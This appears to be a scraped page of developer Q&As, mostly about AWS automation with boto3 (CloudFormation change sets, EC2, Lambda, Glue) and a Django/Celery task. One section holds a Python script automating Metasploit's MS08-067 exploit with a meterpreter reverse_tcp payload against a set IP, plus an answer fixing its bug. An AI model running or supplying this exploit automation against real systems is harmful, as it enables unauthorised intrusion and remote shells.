How to deploy a SAM template using boto3

I am trying to deploy
https://s3.amazonaws.com/serverless-chatbot-code/chatbot.yaml
using the boto3 create_stack function, but I get the error:
"CreateStack cannot be used with templates containing Transforms"
How can I deploy this stack with boto3?
Thanks.

The comment is correct: you have to first create a change set, and then execute it once the change set creation is complete. A code outline is given below.
import time

import boto3

client = boto3.client('cloudformation')

# Helper function to retrieve change set status
def change_set_status(change_set_name, client):
    response = client.describe_change_set(
        ChangeSetName=change_set_name,
    )
    return response['Status']

# Create change set
# (stackname, templateurl, params and capabilities are assumed to be defined earlier)
cs_response = client.create_change_set(
    StackName=stackname,
    TemplateURL=templateurl,
    Parameters=params,
    Capabilities=[capabilities],
    ChangeSetType="CREATE",
    ChangeSetName=stackname + "-cs"
)

# Remove print statements; here for illustration
print(str(cs_response))
change_set_name = cs_response['Id']

# Wait until change set status is CREATE_COMPLETE (bail out if creation failed)
while True:
    status = change_set_status(change_set_name, client)
    print(str(status))
    if status == 'CREATE_COMPLETE':
        break
    if status == 'FAILED':
        raise RuntimeError('Change set creation failed')
    time.sleep(10)

# Execute change set
ex_response = client.execute_change_set(
    ChangeSetName=change_set_name
)

I think you should use a Waiter instead of a while loop, like below:

from pprint import pprint

import boto3

client = boto3.client('cloudformation')

change_set_name = stack_name + "-cs"

# Create change set
cs_response = client.create_change_set(
    StackName=stack_name,
    TemplateURL=templateurl,
    Parameters=params,
    Capabilities=[capabilities],
    ChangeSetType="CREATE",
    ChangeSetName=change_set_name
)

# Wait until the change set has been created
waiter = client.get_waiter('change_set_create_complete')
waiter.wait(
    ChangeSetName=change_set_name,
    StackName=stack_name,
    WaiterConfig={
        'Delay': 3,
        'MaxAttempts': 50
    }
)

desc_response = client.describe_change_set(
    ChangeSetName=change_set_name,
    StackName=stack_name,
)
print("describe_change_set response Changes:")
pprint(desc_response["Changes"], indent=4)

# Execute change set
exec_response = client.execute_change_set(
    ChangeSetName=change_set_name,
    StackName=stack_name
)
print("execute_change_set response:")
pprint(exec_response, indent=4)
My sample repository below may be helpful:
https://github.com/LittleWat/cfn-github-action-sample
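For the template from the question, the placeholder variables used in both answers might be filled in as follows. This is a minimal sketch: the stack name is hypothetical, and the capability is an assumption based on SAM templates containing a Transform and typically creating IAM resources.

stack_name = 'chatbot-stack'  # hypothetical stack name
templateurl = 'https://s3.amazonaws.com/serverless-chatbot-code/chatbot.yaml'
params = []  # assumed: no template parameters needed
# SAM templates usually need CAPABILITY_IAM for the IAM resources they
# create; CAPABILITY_AUTO_EXPAND can additionally be passed to allow
# transforms to expand without review.
capabilities = 'CAPABILITY_IAM'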

Related

Turn on 'termination protection' for all EC2 instances (including future ones) using Lambda

I'm trying to turn on 'termination protection' for all EC2 instances.
(Termination protection does not apply to spot instances, so I want to add a skip condition to avoid errors for spot instances.)
I saw code like the below, but it doesn't work.
import json
import boto3

def lambda_handler(event, context):
    client = boto3.client('ec2')
    ec2_regions = [region['RegionName'] for region in client.describe_regions()['Regions']]
    for region in ec2_regions:
        client = boto3.client('ec2', region_name=region)
        conn = boto3.resource('ec2', region_name=region)
        instances = conn.instances.filter()
        for instance in instances:
            if instance.state["Name"] == "running":
                # print(instance.id)  # , instance.instance_type, region
                terminate_protection = client.describe_instance_attribute(
                    InstanceId=instance.id, Attribute='disableApiTermination')
                protection_value = terminate_protection['DisableApiTermination']['Value']
                if protection_value == False:
                    client.modify_instance_attribute(
                        InstanceId=instance.id,
                        Attribute="disableApiTermination",
                        Value="True")
In summary:
I want to turn on 'termination protection' for every EC2 instance that is running (and is not a spot instance).
The region should be ap-northeast-2.
Could you help me fix this code so that it runs properly?
If you want to skip the spot instances, all you need to do is figure out which ones are spot instances.
You can use the describe_instances API and an if-else condition: if the instance's spot_instance_request_id is set, it is a spot instance; if it is empty, it is not.
import boto3

ec2 = boto3.resource('ec2')
# add filters of your own choice
instances = ec2.instances.filter(
    Filters=[{'Name': 'instance-state-name', 'Values': ['running']}])
for instance in instances:
    if instance.spot_instance_request_id:
        pass  # logic to skip (spot instance)
    else:
        pass  # logic to handle (not a spot instance)
You can refer to a similar question on this -> https://stackoverflow.com/a/45604396/13126651
Docs for describe_instances.
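Putting the pieces together for the question's requirements (region ap-northeast-2, running instances only, spot instances skipped), a minimal sketch could look like the following; the protection-enabling logic comes from the question's own code.

import boto3

REGION = 'ap-northeast-2'

def lambda_handler(event, context):
    client = boto3.client('ec2', region_name=REGION)
    ec2 = boto3.resource('ec2', region_name=REGION)

    # Only consider running instances
    instances = ec2.instances.filter(
        Filters=[{'Name': 'instance-state-name', 'Values': ['running']}])

    for instance in instances:
        # Termination protection cannot be set on spot instances, so skip them
        if instance.spot_instance_request_id:
            continue

        attr = client.describe_instance_attribute(
            InstanceId=instance.id, Attribute='disableApiTermination')
        if not attr['DisableApiTermination']['Value']:
            client.modify_instance_attribute(
                InstanceId=instance.id,
                DisableApiTermination={'Value': True})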

Call DRF ViewSet via Celery task

I have a Django Rest Framework ViewSet:
class MyModelViewSet(generics.RetrieveUpdateDestroyAPIView):
    def perform_destroy(self, instance):
        # do something besides deleting the object
Now I'm writing a Celery periodic task that deletes expired objects based on a filter (let's say end_date < now).
I want the task to reuse and perform the same actions that are executed in the ViewSet's perform_destroy method.
Can this be done? How?
Thanks!
You can solve this by building a DRF Request yourself and having a scheduled Celery task drive the view with it. It works well; I have implemented this before.
Example code:
from rest_framework.request import Request as DRFRequest
from django.conf import settings
from django.http import HttpRequest
from celery import shared_task

from your_module.views import MyModelViewSet

CELERY_CACHING_QUEUE = getattr(settings, "CELERY_CACHING_QUEUE", None)

def delete_resource(resource_pk: int) -> None:
    """
    This method helps to delete the resource by its id.
    """
    print(f'Starting deleting resource {resource_pk}...')
    request = HttpRequest()
    request.method = 'DELETE'
    request.META = {
        'SERVER_NAME': settings.ALLOWED_HOSTS[0],
        'SERVER_PORT': 443
    }
    drf_request = DRFRequest(request)
    # If your API requires the user to have access permission,
    # you should obtain a suitable user object beforehand, e.g.:
    # drf_request.user = user_has_access_permission
    try:
        view = MyModelViewSet(
            kwargs={
                'pk': resource_pk
            },
            request=drf_request
        )
        view.initial(drf_request)
        view.delete(drf_request)
    except (Exception, KeyError) as e:
        print(f'Cannot delete resource: {resource_pk}, error: {e}')
        return
    print(f'Finished deleting resource {resource_pk}...')

@shared_task(name="delete_resource_task", queue=CELERY_CACHING_QUEUE)
def delete_resource_task(resource_pk: int) -> None:
    """
    Async task that helps to delete a resource.
    """
    delete_resource(resource_pk)
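The question asked for a periodic task that deletes expired objects. One way to wire that up (a sketch; MyModel, its end_date field, and the task name are assumptions not present in the answer above) is a scheduled task that finds expired objects and dispatches the delete task for each one:

from celery import shared_task
from django.utils import timezone

from your_module.models import MyModel  # hypothetical model

@shared_task(name="delete_expired_resources_task")
def delete_expired_resources_task() -> None:
    # "Expired" means end_date < now, as in the question
    expired_pks = MyModel.objects.filter(
        end_date__lt=timezone.now()).values_list('pk', flat=True)
    for pk in expired_pks:
        # Each deletion goes through the ViewSet's perform_destroy logic
        delete_resource_task.delay(pk)

You would then register delete_expired_resources_task in your Celery beat schedule to run it periodically.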

Call a Lambda Function with AWS Glue

I'm trying to use boto3 in an AWS Glue job to call a Lambda function, but without results.
I uploaded a zip with the libraries, like the examples by AWS, and also tried without a zip.
With the zip, the error is "Unable to load data for: endpoints".
Invoking without the zip ends in a timeout exception.
import boto3

client = boto3.client('lambda', region_name='us-east-1')
r_lambda = client.invoke(FunctionName='S3GlueJson')

Can someone help me?
In Python, use the Boto3 Lambda client's invoke(). For example, you can create a Lambda container, then call it from a Glue job:
import json
import logging

import boto3
import pandas as pd

logger = logging.getLogger(__name__)

lambda_client = boto3.client('lambda', region_name='us-east-1')

def get_predictions(df):
    # Call the getPredictions Lambda container
    response = lambda_client.invoke(
        FunctionName='getPredictions',
        InvocationType='RequestResponse',
        LogType='Tail',
        Payload=df
    )
    logger.info('Received response from Lambda container.')
    data = response["Payload"].read().decode('utf-8')
    x = json.loads(data)
    df_pred = pd.DataFrame.from_dict(x)
    return df_pred

dfjson = df.to_json()
df_pred = get_predictions(dfjson)
df_pred.head()
If you want to call a Glue job from a Lambda function, you can do it like this:

import boto3

glue = boto3.client(service_name='glue', region_name='us-east-1',
                    endpoint_url='https://glue.us-east-1.amazonaws.com')

# Start job
myNewJobRun = glue.start_job_run(JobName=JOB_NAME)

# Get the current state of the job, to be sure it's running
status = glue.get_job_run(JobName=JOB_NAME, RunId=myNewJobRun['JobRunId'])
logger.info('JOB State {}: {}'.format(
    JOB_NAME, status['JobRun']['JobRunState']))

As job execution can take some time to finish, it's better not to wait for it inside the Lambda function.
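For instance, a fire-and-forget handler could look like this minimal sketch (the job name is hypothetical):

import boto3

glue = boto3.client('glue', region_name='us-east-1')

def lambda_handler(event, context):
    # Start the Glue job and return immediately instead of polling for completion
    run = glue.start_job_run(JobName='my-glue-job')  # hypothetical job name
    return {'JobRunId': run['JobRunId']}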

How to automate Metasploit?

I'm using the following code to automate Metasploit:
import os, msfrpc, optparse, sys, subprocess
from time import sleep

def sploiter(RHOST, LHOST, LPORT, session):
    client = msfrpc.Msfrpc({})
    client.login('msf', '123')
    ress = client.call('console.create')
    console_id = ress['id']

RHOST = "192.168.1.102"
LPORT = "444"
LHOST = "127.0.0.1"

commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST """ + RHOST + """
set LHOST """ + LHOST + """
set LPORT """ + LPORT + """
set ExitOnSession false
exploit -z
"""

print "[+] Exploiting MS08-067 on: " + RHOST
client.call('console.write', [console_id, commands])
res = client.call('console.read', [console_id])
result = res['data'].split('\n')
But it's not working and I'm getting the error:
client.call('console.write',[console_id,commands])
NameError: name 'client' is not defined
What is the problem? Is there any other script that could work in a similar way?
Your indentation is off, so client.call() is performed outside the context where you create the client inside the sploiter function.
Your client only exists inside your sploiter method.
I'm not that familiar with Python, but I think you could adjust the sploiter method so that it returns the client:
def sploiter(RHOST, LHOST, LPORT, session):
    ...
    client = msfrpc.Msfrpc({})
    client.login('msf', '123')
    ...
    return client

In the part below, you could then do something like:

client = sploiter(Parameter1, Parameter2, Parameter3, Parameter4)
client.call('console.write', [console_id, commands])
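Putting that advice together, a corrected outline might look like the sketch below. Note it also returns console_id, since the module-level code needs it too; that detail is an assumption beyond the answer above.

import msfrpc

def sploiter(rhost, lhost, lport):
    client = msfrpc.Msfrpc({})
    client.login('msf', '123')
    ress = client.call('console.create')
    console_id = ress['id']
    # Return both handles so the caller can keep using the console
    return client, console_id

client, console_id = sploiter("192.168.1.102", "127.0.0.1", "444")
commands = """use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.1.102
set LHOST 127.0.0.1
set LPORT 444
set ExitOnSession false
exploit -z
"""
client.call('console.write', [console_id, commands])
res = client.call('console.read', [console_id])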

How to create an EC2 instance through boto Python code

I used the following code, but it is not working:

requests = [conn.request_spot_instances(price=0.0034, image_id='ami-6989a659', count=1, type='one-time', instance_type='m1.micro')]
Use the following code to create an instance from the Python command line.

import boto.ec2

conn = boto.ec2.connect_to_region(
    "us-west-2",
    aws_access_key_id="<aws access key>",
    aws_secret_access_key="<aws secret key>",
)
conn.run_instances(
    "<ami-image-id>",
    key_name="myKey",
    instance_type="t2.micro",
    security_groups=["your-security-group-here"],
)
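Since the question itself was about a spot request, here is a minimal boto sketch of one. The AMI, bid price, and instance type come from the question; the key name and security group are placeholders carried over from above.

import boto.ec2

conn = boto.ec2.connect_to_region(
    "us-west-2",
    aws_access_key_id="<aws access key>",
    aws_secret_access_key="<aws secret key>",
)

# Bid for a single one-time m1.micro spot instance
requests = conn.request_spot_instances(
    price="0.0034",
    image_id="ami-6989a659",
    count=1,
    type="one-time",
    instance_type="m1.micro",
    key_name="myKey",
    security_groups=["your-security-group-here"],
)
print(requests[0].id)  # the spot instance request id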
To create an EC2 instance using Python on AWS, you need an aws_access_key_id_value and an aws_secret_access_key_value.
You can store such variables in config.properties and write your code in a create-ec2-instance.py file.
Create config.properties and save the following code in it.

aws_access_key_id_value = 'YOUR-ACCESS-KEY-OF-THE-AWS-ACCOUNT'
aws_secret_access_key_value = 'YOUR-SECRET-KEY-OF-THE-AWS-ACCOUNT'
region_name_value = 'region'
ImageId_value = 'ami-id'
MinCount_value = 1
MaxCount_value = 1
InstanceType_value = 't2.micro'
KeyName_value = 'name-of-ssh-key'
Create create-ec2-instance.py and save the following code in it.

import boto3

def getVarFromFile(filename):
    import imp
    f = open(filename)
    global data
    data = imp.load_source('data', '', f)
    f.close()

getVarFromFile('config.properties')

ec2 = boto3.resource(
    'ec2',
    aws_access_key_id=data.aws_access_key_id_value,
    aws_secret_access_key=data.aws_secret_access_key_value,
    region_name=data.region_name_value
)
instance = ec2.create_instances(
    ImageId=data.ImageId_value,
    MinCount=data.MinCount_value,
    MaxCount=data.MaxCount_value,
    InstanceType=data.InstanceType_value,
    KeyName=data.KeyName_value
)
print(instance[0].id)
Use the following command to execute the python code.
python create-ec2-instance.py
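Note that the imp module used above is deprecated (and removed in Python 3.12). Since config.properties here is really just a file of Python assignments, one alternative sketch is to exec it into a namespace object:

import types

def get_var_from_file(filename):
    """Load a file of `name = value` Python assignments into a namespace."""
    data = types.SimpleNamespace()
    with open(filename) as f:
        exec(f.read(), vars(data))
    return data

data = get_var_from_file('config.properties')
print(data.InstanceType_value)  # 't2.micro'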
